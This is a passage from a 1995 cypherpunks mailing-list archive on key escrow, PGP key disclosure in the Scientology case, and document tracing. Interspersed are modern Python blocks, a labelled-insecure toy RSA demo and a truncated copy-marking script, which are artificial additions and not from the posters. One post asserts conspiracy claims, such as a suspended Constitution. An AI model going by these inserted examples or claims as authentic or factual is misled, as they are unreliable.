secret material rather than for legitimate purposes.

In the UK the judge can be asked to review documents and decide whether they 
should be made available.

Surely the disclosure laws would work in Wollersheim's favour in any case. He 
can request disclosure of internal Scientology material. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Sat, 9 Sep 95 12:50:58 PDT
To: cypherpunks@toad.com
Subject: Re[2]: [NOISE/Fun] some 'special' primes
Message-ID: <v01510101ac77aaa17723@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


>     No, it's
>
>     ocht hundert elf
>
>     Skip
>

acht, not ocht.

DJK






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 9 Sep 95 13:52:23 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.950909143732.672K-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

well well well,

our anon friend flames away with 'shut up' 'shut up' 'shut up'.  aint 
free speech nice.

it's so nice to see the remailers put to such good use!  if you are going 
to post flames and worthless commentary the least you could do is sign 
the mesg so we can killfile you.

mr. anon, perhaps you've noticed that the govt pretty much does what they 
want.  in this instance we have the chance to have some influence (albeit 
minor) on what the outcome is.  or, perhaps you're just some TLA stooge 
sent to disrupt our plans to take over the world.  

i suppose you think we should just tell the govt to 'shut up'.  yup, that 
will do the trick.  they'll just say, 'gee, sure.  sorry we tried to take 
away your privacy.  our fault.'  right.  the govt would prefer a nice 
docile populace that goes to work and pays their taxes without talking 
back.  

in any event, this isn't the first grade.  we don't tell people to 'shut 
up'.

- -pat, another irish, but ex-catholic, ridiculously cheap labor involving 
      biochemistry

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFH+Y03Qo/lG0AH5AQFncAP/dtUG1rhbbqDDo5fSQfK85e1YrlUWdq7w
fK5v5baDXfKkZG3+O3oxgiggcQo+uFB+EXc7KP2LSpSbUf4GCF1bZj84OaNk7bZY
RqsUSQ6PMUgAbrLynW5fjlSlkGCsRb1m0OOmNAu31K2bv3cfVSlq6ZHdXFcM3j5G
5UtqwoMW17A=
=5CTQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 9 Sep 95 11:59:27 PDT
To: cypherpunks@toad.com
Subject: Sigh Re: not a flame please read and think about this
Message-ID: <53877.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject line is bull*&^&, IMHO, of course

In message Sat,  9 Sep 1995 16:40:00 UTC, an116512@anon.penet.fi  writes:

> to make my point: why is pat farrel helping the nsa and nist make

Learn to spell my name. It is on my .sig, my keys, and in my userid.
We blockheaded, Irish Catholic Americans are damn proud of our name.
Farrell's (along with other cheap Irish labor) built the railroads
from Chicago west.  Please spell it correctly, even if you are flaming me.

> hey why not just write the escorw code for them!!!???
> is mr farrel just being naive or is does he realize who hes working for?
> sorry to single him out but this is just an example of what im talking
> about.

I doubt that this clown deserves a response, but...

There were a number of cypherpunks there. I can't speak for all,
but I expect motives include:

- attempting to clarify vague and confusing wording so we could
understand what they wanted.

- seeing that working with them, rather than yelling at their stupidity,
has a higher chance of getting results.

- we got to meet influential folks from industry who agree with us.

- some of us aren't completely opposed to CKE. I think it has value.
If we could convert their plan for GAK into CKE, it would be a big win,
well worth the effort.

- they are going to promulgate a FIPS PUB standard next week, whether I like
it or not, and whether I help or not. It is better to have that standard
understandable and clear than fuzzy and subject to subjective evaluation.

- getting preposterous misstatements into the formal Federal Register so
we can quote it back to them in the congressional hearings. Mr Geoff
Greivelddinger's words should be handy to quote, for one example.

- there are lots more, but I doubt that I can convince this clown.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 9 Sep 95 14:00:04 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <199509092058.OAA21485@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>hack..print out the idea key.

>using the IDEA key directly.

This would be a neat addition to PGP. It would be fun to take random
data and slap PGP headers on it, and maybe throw in a real encryption
that doesn't report the true IDEA key. It would be a valuable trick
for StealthPGP / stego systems, if we ever need it.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFGJicLa+QKZS485AQH9vgMAwnofHnb7EOpcWVtCp9lWdySM2W7wAnQ5
wNvsKWrEW2aCK+lf1fvNUypLwXN5twA9W1ZLqVOqpJZMjLSVnoo9ulTOJ45hoF2p
BZQGAaFqlnl6IQHbmA7l2vBt55GfWAnS
=lDmq
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael <mike@uac.net>
Date: Sat, 9 Sep 95 12:24:45 PDT
To: sharborth@hai-net.com
Subject: Re: Re[2]: [NOISE/Fun] some 'special' primes
In-Reply-To: <9508098106.AA810686211@houston_cc_smtp.hai-net.com>
Message-ID: <199509091924.PAA26191@mail1.uac.net>
MIME-Version: 1.0
Content-Type: text/plain



>     ocht hundert elf

How about a compromise...

      acht hundert elf


--Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Sat, 9 Sep 95 12:21:44 PDT
To: mike@uac.net>
Subject: Re[2]: [NOISE/Fun] some 'special' primes
Message-ID: <9508098106.AA810686211@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     No, it's
     
     ocht hundert elf
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Re: [NOISE/Fun] some 'special' primes
Author:  Michael <mike@uac.net> at internet
Date:    09-09-95 00:34


> A bit more fun : German : 811 (dunno how to write it, but it starts 
> with an "a")
     
acht hundert uenf  (I think)
     
     
--Michael





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 9 Sep 95 12:37:44 PDT
To: pfarrell@gmu.edu
Subject: DC-area Meeting Sept 16
Message-ID: <56183.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The next DC-area cypherpunks meeting will be next Saturday afternoon
at Digex's headquarters in suburban Maryland.  Please mark
your calendars.

Directions, maps, and exact time will be published soon.

Doug Humphrey says that the office is less than one mile from
public transportation. Carpools worked for the last meeting,
so I expect rides from Northern Virginia and even Baltimore can
be arranged.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Sat, 9 Sep 95 12:31:10 PDT
To: Michael <mike@uac.net>
Subject: Re[4]: [NOISE/Fun] some 'special' primes
Message-ID: <9508098106.AA810686811@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     yah


|>     ocht hundert elf
|
|How about a compromise...
|
|      acht hundert elf
|
|
|--Michael





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sameer R Manek <seawolf@challenger.atc.fhda.edu>
Date: Sat, 9 Sep 95 22:18:38 PDT
To: Pat Farrell <pfarrell@netcom.com>
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <53877.pfarrell@netcom.com>
Message-ID: <Pine.SGI.3.90.950909154927.22329A-100000@challenger.atc.fhda.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think we can end this childish flaming. I hope both Pat and na116512
are mature enough not to respond to this post and if they
want to make sure they keep the mailing list out of this.

If you both want to flame each other take it to private email and 
flame away.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Sat, 9 Sep 95 13:22:53 PDT
To: cman@communities.com
Subject: Re: GAK
In-Reply-To: <v02120d22ac76a26200fa@[199.2.22.120]>
Message-ID: <9509092013.AA02155@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 8 Sep 1995 17:58:57 -0800
>From: cman@communities.com (Douglas Barnes)
>
>
>>
>>If too much attractive stuff is available by loss of any one public key,
>>that key gets attacked.  To compensate for this, the TIS DRC generates new
>>public keys periodically to give out to new (or old) customers.
>>
>>However, a government warrant which demands the DRC's private key collection
>>would gain quite a harvest.
>
>The economics of the situation seem to dictate that whether you have
>one key or N keys, it's going to be cheaper to subvert the escrow agent
>(you guys or whoever) than it is to brute-force even one key. 

You're right, of course.  That's why I, personally, would trust my key
backup only to (k of n) TIS DRCs in Earth orbit or farther out.

>You may feel very comfortable with the personnel and procedures you
>have in place now, ....

People keep assuming that TIS will run a commercial DRC.  We do not plan
to.  We did the design and will sell DRC hardware and security consulting
(physical, policy, ...) to companies wanting to set up their own for
internal use.  That's the only mass DRC market we envision.  This could
change, but that's the current plan.

Meanwhile, the real question is GAK -- whether the DRC you choose to use
goes along with it or not.  You might check my home page for my views on
GAK.  It is possible to have a Corporation running a DRC which refuses to
play along with GAK.  They won't be blessed for attachment to exportable
crypto, most likely, but it's entirely possible for this to exist.  Tim May
may run one, for example.  (I'd still want it to be in orbit.)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Sat, 9 Sep 95 10:09:11 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
Message-ID: <9509091640.AA15487@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


to make my point: why is pat farrel helping the nsa and nist make
better key escrow?

i quote mr farrel:

	We reworded #5 to say "want to Trust the Product." This means that it 
	is untampered, works as expected, etc. We then hashed out ways to 
	know this. The list ended up looking like:
	1. is available only as object code
	2. contains some "hash" function to check for modifications
	3. contains some unique hash, with uniqueness based upon something 
		like "site," "per copy" or "per release" 
	4. Contains policies against modification, such as license language 
		against decompilation.
	5. OS-related security, such as runs "protected mode" instead of as a 
		wild DOS program.

and

	We then developed "goals" including:
	1. One version for sale worldwide
	2. Allow development in the US
	3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-)
	4. Must interoperate with everything
	5. Receiver can only decrypt if escrow agencies can decrypt.

hey why not just write the escorw code for them!!!???

is mr farrel just being naive or is does he realize who hes working for?

sorry to single him out but this is just an example of what im talking about.

he is not the only example by far.

think people!!!!!
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MMac102754@aol.com
Date: Sat, 9 Sep 95 14:05:01 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
Message-ID: <950909170449_15035342@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr anon,

if you want to flame, sign your name.

M MacLeish = MMac102754@aol.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 17:16:55 PDT
To: cypherpunks@toad.com
Subject: RE: CRYPTOGRAPHY ELIMINATES LAWYERS?
Message-ID: <9509201549496270@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 09 Sep 1995 12:41:12 -0700
To: cypherpunks@toad.com
From: Alan Olsen <alano@teleport.com>
Subject: Re: cryptography eliminates lawyers?

At 02:44 PM 9/8/95 -0400, you wrote:
>We wish!  We really wish!

"Fill that lawyer with a few more slugs of encryption!"

The argument that encryption will free us from all the legal ills of the
world is pretty specious.  If anything it will make more work for lawyers as
the non-clue-endowed portion of the world tries to come to terms with the
new technology.  They will make rules and subsets of rules and exceptions to
rules and variations to interpretations of rules that will make the current
set look like the rules to "chutes and ladders".  Part of the job of the
lawyer class is to guarantee the existence of work for other lawyers (as
well as themselves).  It does not depend on what the medium of exchange is.
Lawyers and government forces will try and figure out some way to try and
extract it from you.

The government is trying very hard to keep any scrap of power from creeping
away from them.  You can bet that they will try everything they can think
of, rational and irrational, to regulate and control the wilds of
cyberspace.  They will pump up every imaginary boogieman to help them get
the public to swallow what they are fed.  By the time they figure out they
have been had, it will be too late.  Cypherpunks must be the syrup of ipecac
to the government's dose of poison to the body politic!  (I need to start
drinking more coffee in the morning.  I cannot believe I wrote that...)

Unfortunately the public does not thrive on logic.  They had been trained to
react emotionally to things and not react logically.  I am not certain what
can be used to get them to realize why they need encryption.  Dispelling the
bogeymen is one need. The other thing is that the tools need to be made as
simple as possible.  The current tools for use require a fair bit of
technical understanding.  Until they have an integrated front-end that makes
it about as easy to use as America On-Line, encryption will not gain
widespread usage.  This is the type of code that needs to be written.
Making integrated tools like newsreaders and mail programs that support
strong encryption directly is what is needed for widespread use.  (As well
as being usable programs in and of themselves.  Many of the programs for
news and mail are crap.)  Making cryptography a "cool and fun thing to use"
will help dispel many of the myths and may help to defuse the government
created bogey men.  (Of course they will claim that it aids "criminals and
terrorists", but to them EVERYONE is a criminal and a terrorist.)  
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 9 Sep 95 22:13:50 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology/Wollersheim as test case for key disclosure
Message-ID: <v01510100ac77f0effd65@[198.59.115.132]>
MIME-Version: 1.0
Content-Type: text/plain


Phill <hallam@w3.org> wrote,
>One solution to this problem would be to modify PGP so that the session
>key for
>the document was released rather than the passphrase for the public key. The
>former would provide only read access, the latter would allow the
>scientologists
>to forge Wollersheim's signature on other material. In addition many of the
>documents may be subject to privilege.

It seems to me that if this kind of risk was seen ahead of time that a
method doing the equivalent using ordinary PGP commands could be agreed
upon by all involved.  The document could be encrypted using "PGP
conventional encryption" and the pass phrase for that could then be encrypted
using the public key.  The encrypted document would thus consist of these
two parts.  The breaking of the traditional decryption into its two parts
would not be needed--superficial use of PGP would work.

The owner of the public key--who is in possession of the document encrypted
as suggested--when threatened by an attacker--who is also in possession of
the document--with an unbearably high cost for not giving up his secret key
can offer to give up the password for the "PGP conventional
encryption".

This method does not define how the password is obtained and that might be
a weakness.

I confess I'm new to PGP (and this subject in general) and am ignoring the
suggestion in Tim May's FAQ that newbies try not to look clueless.

Dar Scott


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================
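
The distinction drawn in Phill's message and in Dar Scott's reply above, as an added example that is not from either poster or from PGP itself: each document gets its own session key wrapped under the recipient's public key, so releasing one session key opens one document, while releasing the private key opens everything and permits forged signatures. The toy RSA key (two Mersenne primes, no padding), the HMAC-based stream cipher and every function name are assumptions chosen so the model runs on the Python standard library alone.

```python
import hashlib
import hmac
import secrets
from math import gcd

# Toy RSA key built from two Mersenne primes. Constructed for this example:
# far too small and unpadded for real use; it only models "public vs private".
P, Q = 2**127 - 1, 2**107 - 1
N, PHI = P * Q, (P - 1) * (Q - 1)
E = next(e for e in range(65537, 70001, 2) if gcd(e, PHI) == 1)
D = pow(E, -1, PHI)  # long-term secret; this is what a passphrase unlocks


def _prf(key: bytes, label: bytes) -> bytes:
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(key: bytes, length: int) -> bytes:
    blocks = (_prf(key, b"stream" + i.to_bytes(8, "big"))
              for i in range((length + 31) // 32))
    return b"".join(blocks)[:length]


def sym_encrypt(key: bytes, plaintext: bytes):
    """Stand-in for the conventional cipher: XOR stream plus a MAC tag."""
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, len(plaintext))))
    return ct, _prf(key, b"mac" + ct)


def sym_decrypt(key: bytes, ct: bytes, tag: bytes) -> bytes:
    if not hmac.compare_digest(tag, _prf(key, b"mac" + ct)):
        raise ValueError("session key does not match this document")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, len(ct))))


def hybrid_encrypt(plaintext: bytes) -> dict:
    """Fresh session key per document, wrapped under the public key (E, N)."""
    session_key = secrets.token_bytes(16)
    ct, tag = sym_encrypt(session_key, plaintext)
    wrapped = pow(int.from_bytes(session_key, "big"), E, N)
    return {"wrapped_key": wrapped, "ct": ct, "tag": tag}


def unwrap_session_key(msg: dict, d: int) -> bytes:
    """Only the private-key holder can do this; the result is per-document."""
    return pow(msg["wrapped_key"], d, N).to_bytes(16, "big")


def _digest_int(data: bytes) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N


def sign(data: bytes, d: int) -> int:
    return pow(_digest_int(data), d, N)


def verify(data: bytes, sig: int) -> bool:
    return pow(sig, E, N) == _digest_int(data)


def disclosure_demo() -> dict:
    doc_a = hybrid_encrypt(b"constructed document A (the one demanded)")
    doc_b = hybrid_encrypt(b"constructed document B (unrelated, privileged)")

    # Option 1: the owner unwraps and releases only document A's session key.
    released = unwrap_session_key(doc_a, D)
    read_a = sym_decrypt(released, doc_a["ct"], doc_a["tag"])
    try:
        sym_decrypt(released, doc_b["ct"], doc_b["tag"])
        b_open_with_session_key = True
    except ValueError:
        b_open_with_session_key = False

    # Option 2: the owner releases the private key itself. The recipient can
    # now unwrap every session key and sign text the owner never wrote.
    read_b = sym_decrypt(unwrap_session_key(doc_b, D), doc_b["ct"], doc_b["tag"])
    forged = b"constructed statement the owner never wrote"
    return {
        "a_with_session_key": read_a,
        "b_open_with_session_key": b_open_with_session_key,
        "b_with_private_key": read_b,
        "forgery_verifies_with_private_key": verify(forged, sign(forged, D)),
    }


if __name__ == "__main__":
    for name, value in disclosure_demo().items():
        print(name, "=", value)
```

Dar Scott's variant maps onto the same structure: the "PGP conventional encryption" pass phrase plays the role of `session_key`, and encrypting that pass phrase to the public key plays the role of `wrapped_key`.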






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 9 Sep 95 22:15:47 PDT
To: cypherpunks@toad.com
Subject: RSA licensing costs?
Message-ID: <199509100038.UAA06872@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone know how much RSA wants per desktop in a large
client application?  Using the BSAFE derived licenses would be fine
for this.  (We're looking at 2-10k licenses for a nameless financial
institution, doing those things that RSA likes. :)

Adam

--
"It is seldom that liberty of any kind is lost all at once."
						-- Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uSuRa <usura@utopia.hacktic.nl>
Date: Sat, 9 Sep 95 12:20:17 PDT
To: cypherpunks@toad.com
Subject: WoT keyring (fwd)
Message-ID: <199509091919.VAA00549@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text


Forwarded message:

> From: don@stat8.byu.edu (Donald M. Kitchen)
>  
> Due to problems distributing my Web of Trust keyring from my own site,
> I have uploaded a .gz version. Please announce it to cpunks as soon
> as you have changed the permissions.
>  
> Thanks
> Don


 This file is available from:

	ftp.hacktic.nl/pub/pgp/pgp-key-ring/donring.pgp.gz

 944 -rw-r--r--   1 pub  pub  955577 Sep  8 18:37 donring.pgp.gz


 EnJoY !
  -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uSuRa <usura@utopia.hacktic.nl>
Date: Sat, 9 Sep 95 12:24:38 PDT
To: don@stat8.byu.edu (Donald M. Kitchen)
Subject: Re: WoT keyring
In-Reply-To: <9409091627.AA05472@stat8.byu.edu>
Message-ID: <199509091923.VAA00663@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text


From Donald M. Kitchen:

>  
> Due to problems distributing my Web of Trust keyring from my own site,
> I have uploaded a .gz version. Please announce it to cpunks as soon
> as you have changed the permissions.
>  
> Thanks
>  
> Don
> 


	It's available from:	

	ftp.hacktic.nl/pub/pgp/pgp-key-ring

total 946
   1 drwxr-xr-x  2 pub  pub     512 Sep  9 21:15 ./
   1 drwxr-xr-x  4 pub  pub     512 Sep  9 21:14 ../
 944 -rw-r--r--  1 pub  pub  955577 Sep  9 21:15 donring.pgp.gz
     


	Regards,
	 -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 9 Sep 95 22:11:02 PDT
To: cypherpunks@toad.com
Subject: Bizdos citizenship?
Message-ID: <199509100434.VAA10595@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is this statement in the same class as an Elvis sighting?  Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?

Please don't get carried away and turn this into a Net rumor.  I'm just curious if anyone on the list can confirm or deny the citizenship comment.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Sat, 9 Sep 95 22:39:24 PDT
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Bizdos citizenship?
In-Reply-To: <199509100434.VAA10595@mail.eskimo.com>
Message-ID: <Pine.BSD.3.91.950909223404.26464A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Sep 1995, Joel McNamara wrote:

> Date: Sat, 09 Sep 1995 21:34:11 -0700
> From: Joel McNamara <joelm@eskimo.com>
> To: cypherpunks@toad.com
> Subject: Bizdos citizenship?
> 
> In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is this statement in the same class as an Elvis sighting?  Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?
> 
> Please don't get carried away and turn this into a Net rumor.  I'm just curious if anyone on the list can confirm or deny the citizenship comment.
> 
> Joel McNamara
> joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
> Thomas Jefferson used strong crypto, shouldn't you?
> 


You should consciously be aware that the U.S. Government *will* break 
its own laws to further its goals.  You should know that such a law as 
"this shall be the law unless the fuhrer disagrees and then what the 
fuhrer says shall be the new law"  [yes, such a law was in Nazi 
Germany's lawbooks]  in the states we call it "Executive Order" and with 
the U.S. being one of the most powerful outlaw governments on this 
planet, you should watch them anyway.  Don't count on your citizenship or 
location outside of the US as protecting you.   If they want you, you are 
dead-meat.  You know it too!


BTW, if you are going to say 'well the US has a Constitution, well we 
*don't* it was suspended in 1933...
||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 9 Sep 95 22:22:21 PDT
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <1995Sep9.230847.16371@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:

>Then shut up.
 [[ drivel excised ]]
>Then shut up.

Please do us the favor of using a killfile-able name in the future.
-- 
  "Captain Kirk and I both want the same thing: the whole-hearted devotion
of a naive alien.   And if certain things stand in our way -- Klingons for
Kirk, reality for me -- well, we just have to suck in our guts, set the
phasers on Stun, and hope for the best."    Ian Schoales (Merle Kessler)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Sat, 9 Sep 95 22:11:18 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Scientology/Wollersheim as test case for key disclosure
In-Reply-To: <Pine.PMDF.3.91.950909100445.541100226A-100000@umiami.ir.miami.edu>
Message-ID: <Pine.SOL.3.91.950909231834.10116D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


For some reason I think it was French, but I don't
have a citation either.  But I think you're right.

MacN

On Sat, 9 Sep 1995, Michael Froomkin wrote:

> Ah.  but if there is no plaintext, the question is whether you comply 
> with the rule by providing the encrypted text rather than plaintext.  I 
> would say you have to provide the plaintext in the absence of a legitimate 
> privilege claim, but I don't recall a case to this effect (there is 
> precedent for requiring translation of foreign language documents when 
> the request is covered by an evidence convention; I don't recall if there 
> are any such cases that fall purely under domestic US rules).  Anyone have 
> chapter and verse?
> 
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | mfroomki@umiami.ir.miami.edu
> U. Miami School of Law     | 
> P.O. Box 248087            | It's hot here.  And humid.
> Coral Gables, FL 33124 USA |
> See (soon to move to its real home): http://www.law.miami.edu/~mfroomki
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 10 Sep 95 00:07:21 PDT
To: cypherpunks@toad.com
Subject: Re: Internet commerce mtg, Denver
Message-ID: <199509100705.AA22815@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

L. Detweiler's tentacle Vlad Nuri writes:

> [...]
> the rep told me something interesting: he said that every
> Bell phone book is actually "seeded" with dummy names
> so they can detect copyright infringers. if you come out
> with a business directory, these Bells will just scan for
> the fake names that they have inserted into their own listings.
> if they find them, supposedly they can show them to a copyright
> judge and he will immediately close down your operation and
> fine you, almost no questions asked. I didn't know how much
> of this really happens (the legal stuff sounded questionable
> to me) but it is an interesting "real world" instance of
> copyright terrorism prevention that the "information liberation
> front" would have to contend with. 

While he's correct that publishers of data compilations do use
dummy entries to track [mis]use of their data, he's incorrect when
he asserts that it's possible to get a copyright on an ordinary
white-pages style directory. (_Feist v. Rural Telephone_, 499 US 340
(1991), http://www.law.cornell.edu/supct/classics/499_340v.htm ).
This practice occurs when mailing lists are sold, and in the 
drafting of maps (non-existent streets or sections of streets may
be added, or changed in an unremarkable way). 

It's also possible (and getting easier with laser printers, etc) to
generate apparently identical but distinguishable documents for
use where disclosure of the documents is controlled; the distinguishing
parts (perhaps a misspelled word or other apparent typo, or a change
in line spacing between paragraphs, or altered line breaks) can then
be used to trace a recovered "leaked" document to the person who
received it originally. Where the documents are digital (or
digitizable), two or more recipients could collude to 'diff' their 
copies, and find the barium data; but a savvy document-distributor
could generate copies with multiple ID-bits, such that any two copies
might have differences between the two, but barium data that's the
same yet different from the other participants. So those two 
colluders round up a third recipient [...] It's basically a form of
very-low-bandwidth text-only steganography.  

Of course, we're wandering into FAQ territory; isn't there something
in the Cyphernomicon about digital signatures for physical items 
being used as proof of source? (e.g., you'll know that the expensive
motorcycle part you just bought really *is* from Harley-Davidson,
not a cheaper part placed in a knockoff Harley box) 
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFIOtX3YhjZY3fMNAQGlwAP+KhhBK1MGDvsNizH5Pu7XsqQg6rPxnCp2
q5YRZrQyVktit8hK+TbHcodAvG7IWK2vFuI1y80dFx5sKfAqjLU81rth7Pad7nRm
USUYUIxlvnaO7dOWUPMsEaaad2uZpLn/ALoTwXsYqzT2YjPyl1/YYLTHkmK/PHUI
5C6yJNKtpAY=
=CwZF
-----END PGP SIGNATURE-----
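
The multi-bit copy marking and the two-recipient 'diff' described in the message above, as an added example that is not part of the original post. The HMAC-derived ID bits, the 512 variation sites, the recipient names and the 5-sigma accusation threshold are all assumptions made for the illustration.

```python
import hashlib
import hmac

SITES = 512                              # variation points (line break, spacing, typo)
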